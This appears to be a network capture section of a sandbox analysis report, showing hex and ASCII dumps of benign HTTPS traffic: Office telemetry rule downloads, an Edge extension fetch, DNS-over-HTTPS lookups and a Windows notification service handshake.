2024-11-25 23:25:38 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120642" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120641" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
51	192.168.2.6	49797	13.107.246.63	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:37 UTC	192	OUT	GET /rules/rule120644v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-25 23:25:38 UTC	498	IN	HTTP/1.1 200 OK Date: Mon, 25 Nov 2024 23:25:37 GMT Content-Type: text/xml Content-Length: 479 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT ETag: "0x8DC582BB7D702D0" x-ms-request-id: 8dfbf447-101e-0028-0f8e-3f8f64000000 x-ms-version: 2018-03-28 x-azure-ref: 20241125T232537Z-174f7845968cpnpfhC1EWR3afc0000000u6g000000000324 x-fd-int-roxy-purgeid: 0 X-Cache-Info: L2_T2 X-Cache: TCP_REMOTE_HIT Accept-Ranges: bytes
2024-11-25 23:25:38 UTC	479	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 34 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 34 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120644" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120643" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
52	192.168.2.6	49798	172.217.19.225	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:37 UTC	594	OUT	GET /crx/blobs/AW50ZFsLPhJJyx_4ShcDOgcEpJeOc7Vr0kMzfFRoaMfWx4pAgZ0UGF2i9_ei1A7FAHQ-EPFULeBn7F8_SEKhjbpEyKfiidX7GF_6BDOycMeg5w03wjwVQ61hkaEix8WFqmEAxlKa5cmz_tdFr9JtRwdqRu82wmLe2Ghe/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_84_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.55 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-11-25 23:25:38 UTC	566	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Length: 138356 X-GUploader-UploadID: AFiumC5PORTvvCZnmg8ylymoVoIJR9ylyfodIevcpGIOY4YlNiBXS_Kucpitjhh8E-j3chUYGCc X-Goog-Hash: crc32c=ld9IFg== Server: UploadServer Date: Mon, 25 Nov 2024 16:45:00 GMT Expires: Tue, 25 Nov 2025 16:45:00 GMT Cache-Control: public, max-age=31536000 Age: 24038 Last-Modified: Tue, 19 Nov 2024 16:44:49 GMT ETag: 2373c8b9_cba0b209_e851cacf_d4df989e_81c52a41 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-11-25 23:25:38 UTC	824	IN	Data Raw: 43 72 32 34 03 00 00 00 e0 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 3a 5f 86 5f 7f f9 35 7d d5 75 53 5c 9b ff 18 eb af ff 78 3f ab fa d7 9f 7e 5d cf 1f 43 2d ff b3 ba 0c 53 3d 4c bf fe f2 f7 5f 63 f1 50 97 42 ea cf d7 8f b0 2d 4d db 10 dc 36 32 b3 69 2a b3 51 d5 e3 f8 c4 ad eb 39 ef e7 ef dc 9c de 2b 53 3d 89 f4 f8 84 0e 2f 36 3a df cf c2 57 83 c8 90 71 6c 2f 67 fd f9 26 6a a9 79 fc f9 7b af ae 22 8b ce b1 9a fe 7c 1c dc 46 fa 1f e7 f8 7c 9c a3 f6 e3 56 f9 f6 f0 f3 99 aa 77 be 25 74 2e 79 86 2e 3f df 17 26 e2 e2 61 cc 9c 7f 3c d2 6e c2 88 c1 89 f6 53 2b 7c d4 17 3d 05 72 61 c7 0a 84 08 01 b1 27 7d f8 28 82 70 57 fb c2 16 8f d0 39 05 d7 73 e5 43 a3 d8 1f 9f 8e ca b9 96 26 6a 4a 9f 2d 27 13 f6 27 13 a8 ca 42 8d 30 f5 75 3f 2e a5 b9 3b 9f f6 e1 a3 34 9d 7f cf f3 e7 d9 c2 b9 f0 d4 c0 ac e6 90 42 86 4e 5c 7c a7 3d 83 9c c3 33 Data Ascii: :__5}uS\x?~]C-S=L_cPB-M62i*Q9+S=/6:Wql/g&jy{"\|F\|Vw%t.y.?&a<nS+\|=ra'}(pW9sC&jJ-''B0u?.;4BN\\|=3
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 60 65 eb 98 45 ab ec b5 f7 df 38 3e ce 17 36 8b 4c d7 7b 85 4d 64 18 16 65 b0 90 1e f2 cb 03 4c 8a 00 e1 48 79 96 ec 9b 3d f6 a0 d6 80 10 57 0f 10 60 43 7e af 8e 3f 1c b7 7a ee 1d 59 c2 29 1a 94 12 c6 ec 9e 28 ba 47 74 ea a9 92 fb f2 20 bd f4 20 c3 8a 8a 04 03 ec 56 83 d6 68 aa f5 88 d1 39 0a d6 d7 be fa 7f 68 70 d5 e2 31 37 1a 25 03 f1 55 98 2a 4b bd 68 22 81 eb 25 ad 18 84 19 e6 b8 d7 a1 60 b9 67 e1 89 9c f6 e2 ad 52 d0 c5 a6 dc ad e7 9e dc ca 7f d2 3e 77 87 7d e1 a1 a5 e9 a4 17 9a 04 c0 1e 05 42 14 c6 78 22 8b d6 00 1f f3 28 78 31 13 f3 7e 67 01 4e 72 8a 0f 75 ff 71 5f e5 6f 6d cd bd d1 43 0a 76 99 35 be 4a e5 2d 31 6c 3a 02 10 c5 56 13 ea 1e 23 15 1d 58 74 af 43 75 3d f0 13 03 bc 22 a2 fc ca 82 66 b9 ee fd 2e c5 46 f6 b8 53 d7 bc 55 5e 3d b8 46 34 c8 Data Ascii: `eE8>6L{MdeLHy=W`C~?zY)(Gt Vh9hp17%U*Kh"%`gR>w}Bx"(x1~gNruq_omCv5J-1l:V#XtCu="f.FSU^=F4
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 7d dd cf 6f 71 6a 3c aa 40 7e 15 06 ce 18 81 87 14 8e b0 58 44 27 7a dd 77 ac b1 b7 dc 66 ab cf 89 e9 ce a6 3c ec 05 3f 02 02 d8 27 ea 46 4f 70 bb e1 2d 44 84 4e 09 f6 ed 1b e9 1b c5 3d 68 a6 0c d9 75 0f 3f b1 8e cd 35 f6 95 bf 91 bd 1a 69 d1 42 51 b5 ee b9 e2 ce 89 50 6c 26 16 de 89 5e bc e6 c4 fd 26 da f5 e3 ce 69 10 77 1e cc c8 01 e9 9e 41 6a 55 a0 38 bc ac b1 bf 6b be 7b ba 51 77 aa c0 9b 05 fc b0 44 37 6a e6 e1 c0 0e 78 4a 7b 14 13 4f eb 10 ed ee 3f fb 8d c4 1f af b9 25 7e f2 af cb 87 f0 11 f9 c7 c7 ff c1 df c8 80 4b b7 c6 3f 03 ce 51 66 ae c1 bd e9 35 31 9c a0 54 88 27 0b eb 52 98 2c 14 76 36 e7 d3 53 74 70 f3 94 48 50 51 74 c1 6a 6c c5 02 57 75 bf ea 37 d6 5c 85 75 ff 1a de 92 f6 c3 8e 3c db 2b f4 fc 0a bf 49 4b a8 ce 14 7e 00 ce c6 ac 26 ca 94 9e Data Ascii: }oqj<@~XD'zwf<?'FOp-DN=hu?5iBQPl&^&iwAjU8k{QwD7jxJ{O?%~K?Qf51T'R,v6StpHPQtjlWu7\u<+IK~&
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: ae e7 0e 9d 1f 06 63 15 24 ff cb b8 61 7b a2 4e 58 74 c0 4c 09 86 ba 97 48 e8 03 c4 a9 0f ee 35 65 bd 60 e1 21 a1 18 44 a6 bd 68 e1 33 23 9a dc 91 a1 d2 1c 38 bf d3 98 ca 64 0f d9 ab 56 8f 6d 95 56 f8 a5 e3 ec 3d ef d5 2d b3 5c 3d e6 ff 3a fe 0d 19 c0 60 d4 b8 23 8f b9 88 da a3 ee df 88 f6 ec a7 9c 21 9f 2e 21 cc 81 f2 75 fd ed 12 f6 f3 fe 52 6a 9f db f0 a2 fb e9 a7 81 d4 f7 eb f5 58 53 9e 25 3f f7 32 7e 98 ff 3b 96 ae c7 fe 9f e7 2d df ff f0 9c e5 bf be 3b 4a 9f 4d 99 a9 ba 7f 9d 95 6c 74 8c da b7 42 c7 85 e0 d3 bd e4 8e ca 4d fb 56 f6 ea 5a f6 b6 f6 9f f3 77 e9 37 5f 85 df 9d ff fb bb 96 8e e7 01 8d 3f b9 f3 73 16 f3 d4 7e 18 a7 d6 fb f9 ff 5d c7 97 a1 e3 ee bb 84 8e a9 59 2c 05 d7 fa d6 5e e6 f7 e4 df 87 46 8b e9 f6 55 5f 7f fd e5 af 7f ff d5 d4 85 ac Data Ascii: c$a{NXtLH5e`!Dh3#8dVmV=-\=:`#!.!uRjXS%?2~;-;JMltBMVZw7_?s~]Y,^FU_
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: c2 43 a0 f0 9c cf 84 2c dc 6f 77 dd ff 5e 04 27 23 01 db 3b d0 22 fa fd ca c2 00 94 91 17 e4 5e bb e4 28 b3 f2 09 87 4b 75 14 8e e0 c2 6f 3a 13 0a 28 96 4a ee 0a 6a 2c 09 f3 2c c2 e9 23 6a 8c ec 09 a0 e8 96 87 84 d2 68 a5 cd ca f5 ec 0a 46 60 f9 be 7b e8 5e a6 f5 2e a5 46 6e c8 a6 db bc 01 50 4b 07 08 1d fb 12 3a a0 00 00 00 23 01 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 72 6f 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8d 52 c1 4e 1c 31 0c bd f3 15 d6 9c 8a 34 a0 65 7b 82 1b 82 55 4f 85 aa 2d 97 aa 17 6f c6 b3 58 ca 38 51 e2 00 5a c4 bf e3 99 Data Ascii: C,ow^'#;"^(Kuo:(Jj,,#jhF`{^.FnPK:#PK!-_locales/ro/messages.jsonUT6*g Ad/RN14e{UO-oX8QZ
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 0f 6e 3d 2c 91 9f b7 f2 c2 8f 9e 81 ed 64 91 89 5f c8 93 db ec d7 38 3e f4 ec 97 19 5a 11 ad f3 b8 82 28 3a 6c b3 ee 24 e1 50 fb 79 09 cf f1 ad 57 e9 76 70 aa 85 35 32 aa 0a 0f 41 0d 1c 63 cf 15 51 0d 8c 44 97 9c 43 b8 94 04 8f 60 5f 09 e2 4b c0 6e a2 3a 29 12 e1 86 4f 49 97 b9 92 11 e2 5a d6 16 fc 60 20 03 a5 d7 f5 68 06 5f 65 93 9a dd ad 65 97 51 8b ac 05 b4 69 a5 64 30 17 f8 1c 4a 1d 10 6c a0 02 36 20 1b 29 c2 cd 6a e6 f5 e9 55 66 60 81 a8 0e 0c 0c 22 4a e0 41 05 8c 7f 9c 57 46 cf 54 ff 32 7c 7d 9b 6e 4b 1e be a1 2b 8b 2c ea 96 fa 5c 18 5d 04 b1 51 7c 89 a2 45 6d 3a 0b 61 c3 6f a2 78 04 e6 19 c0 10 c1 b2 2f e8 63 ec 0d 6c f9 20 a0 26 d6 8b ea b0 75 64 be 5d fd c4 70 d9 3b b5 ed d4 f1 bc 8d 4d 4a b4 8e 05 bc 1a 18 57 05 34 4d 40 13 b4 28 e5 ea ff 64 31 Data Ascii: n=,d_8>Z(:l$PyWvp52AcQDC`_Kn:)OIZ` h_eeQid0Jl6 )jUf`"JAWFT2\|}nK+,\]Q\|Em:aox/cl &ud]p;MJW4M@(d1
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 80 ac 82 c5 04 63 89 63 38 bd 2a 36 1c e9 9a 44 2a 3c 4e 2d ee 92 46 8e 50 dc e3 94 bb f5 61 c2 1d cf 5c 48 24 42 49 6c 12 12 d7 49 d9 ae b5 78 32 3e ee bd 6d 14 36 10 04 42 78 75 49 e8 56 12 9a c0 f8 4e 5b 9e a8 18 48 07 60 fa c4 f3 b8 1c e9 66 42 8d 56 0a 4d 3a 20 57 32 60 3d 87 5b 12 2d 22 e5 44 56 25 e1 21 a6 58 0d e8 46 f5 04 83 06 0e 87 28 fb a4 f0 19 18 b8 02 88 01 7c 80 61 ef 0c 9c e0 24 d3 07 48 c9 09 3f e2 9c 5e e9 89 97 4b 26 3f f6 66 0d 22 cf 03 86 52 31 81 e4 3a 97 fa 54 dc fb b0 49 d9 ef a1 7d 1a 46 e5 77 f4 02 a7 fd a6 7b 35 4f fa 61 2c 0d 6e 07 7a 72 4d 94 18 5d f3 fe 4e 2c 30 9b 6d f6 54 60 d0 58 d4 81 d8 05 43 89 9b 2d 91 75 b1 84 72 e5 82 16 5a a8 d1 8f 71 28 22 a2 ed 69 03 7e 0f 3a 87 3c 26 69 4c 4d 0a 36 d7 c7 a7 16 96 fa 98 fd 47 dc Data Ascii: cc86D<N-FPa\H$BIlIx2>m6BxuIVN[H`fBVM: W2`=[-"DV%!XF(\|a$H?^K&?f"R1:TI}Fw{5Oa,nzrM]N,0mT`XC-urZq("i~:<&iLM6G
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 92 6f 30 19 61 42 16 3c c5 8e d8 b3 84 2e 10 d8 71 39 f8 5c 22 7b 60 27 ee 3a 3f 1a 26 6a f5 a8 f2 1f 13 ad 85 fc dd 51 24 58 d5 3c 25 19 9d fa 2b 81 d6 c7 4d 37 fd 9a e2 f2 53 ad 5f c1 c9 b9 41 f8 0f 77 84 84 39 d5 5c 7f 74 b0 dd bb 43 ac e6 be ce d5 bf df bb 77 82 1b a6 ff 9c 05 67 3a 77 fe 7a f2 5d 9a 09 4d 66 b5 8d f8 e6 d8 2d cb 4e 6d ee a3 82 48 7b c6 a8 5d b2 e8 52 97 3d e5 a5 b8 ef 36 ad cf 46 de f8 e7 8e 98 46 5f 0f 08 b5 d5 be 41 c5 77 eb e3 54 28 7a 31 07 87 c9 e3 1b f0 13 22 9f 73 e2 40 ce 5e e0 09 2d 54 01 dc 63 06 df 9b 0e c1 43 bf 5c bc 02 50 4b 07 08 c0 47 8a 9f 88 01 00 00 46 03 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 6b 6d 2f 6d 65 73 73 61 67 65 73 2e 6a Data Ascii: o0aB<.q9\"{`':?&jQ$X<%+M7S_Aw9\tCwg:wz]Mf-NmH{]R=6FF_AwT(z1"s@^-TcC\PKGFPK!-_locales/km/messages.j
2024-11-25 23:25:38 UTC	1390	IN	Data Raw: 46 69 27 57 e6 ee 9e df fa e6 7c 6c 22 ff dc fc cd 83 bf 84 75 53 df fb 95 fb e0 a6 5b e2 f7 c1 5f 87 cb 78 0d a9 ac a4 0c 68 8e 44 f1 68 52 0e 42 cf 48 31 70 61 e4 4c d1 69 c5 a7 46 2f 04 a6 71 7a 9a be 86 7e 9a df 4a 91 d1 b6 e2 f0 34 96 a4 11 21 a4 4d e9 67 b4 5d b3 aa 52 cd 51 3d 41 bb 66 f2 ab fd 2b c2 fc 18 cf 78 47 7c 50 e9 5f 0e f0 9b c4 43 6a 2a f2 42 35 42 84 04 d7 70 02 ab 0d b5 b1 89 32 98 e2 55 e6 4f d6 3f 1c 81 d7 4f df 01 50 4b 07 08 80 81 20 9b 32 02 00 00 f3 0a 00 00 50 4b 03 04 14 00 08 08 08 00 00 00 21 00 00 00 00 00 00 00 00 00 00 00 00 00 19 00 2d 00 5f 6c 6f 63 61 6c 65 73 2f 73 6b 2f 6d 65 73 73 61 67 65 73 2e 6a 73 6f 6e 55 54 05 00 01 ca 36 2a 67 0a 00 20 00 00 00 00 00 01 00 18 00 00 41 64 ae 95 2f db 01 00 00 00 00 00 00 00 00 Data Ascii: Fi'W\|l"uS[_xhDhRBH1paLiF/qz~J4!Mg]RQ=Af+xG\|P_CjB5Bp2UO?OPK 2PK!-_locales/sk/messages.jsonUT6g Ad/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.6	49805	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 23:25:38 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 23:25:38 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e85662a6f663314-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 23:25:38 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 63 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomcA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.6	49802	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 23:25:38 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 23:25:38 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e85662a8a3f430a-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 23:25:38 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1e 00 04 8e fa 41 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomA)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	49801	162.159.61.3	443	1916	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-11-25 23:25:38 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-11-25 23:25:38 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Mon, 25 Nov 2024 23:25:38 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8e85662a59877d05-EWR alt-svc: h3=":443"; ma=86400
2024-11-25 23:25:38 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 1d 00 04 8e fa 50 23 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomP#)

Session ID	Source IP	Source Port	Destination IP	Destination Port
56	192.168.2.6	49800	20.198.119.143	443

Timestamp	Bytes transferred	Direction	Data
2024-11-25 23:25:38 UTC	71	OUT	Data Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 73 33 4f 47 59 34 50 36 42 55 71 47 7a 39 4c 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 37 36 62 36 30 31 32 61 65 38 34 65 38 61 65 0d 0a 0d 0a Data Ascii: CNT 1 CON 305MS-CV: s3OGY4P6BUqGz9LO.1Context: 876b6012ae84e8ae
2024-11-25 23:25:38 UTC	249	OUT	Data Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 